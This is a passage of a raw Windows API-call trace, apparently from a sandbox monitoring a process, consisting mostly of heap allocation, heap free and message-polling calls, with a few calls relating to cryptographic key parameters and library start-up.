lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0035.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.087] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da398 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.088] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.088] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0035.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.089] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0035.090] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.090] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.090] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.092] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.093] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.094] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.094] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.094] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.094] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.094] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0035.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.094] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.095] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.095] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.095] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.095] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.095] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.095] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 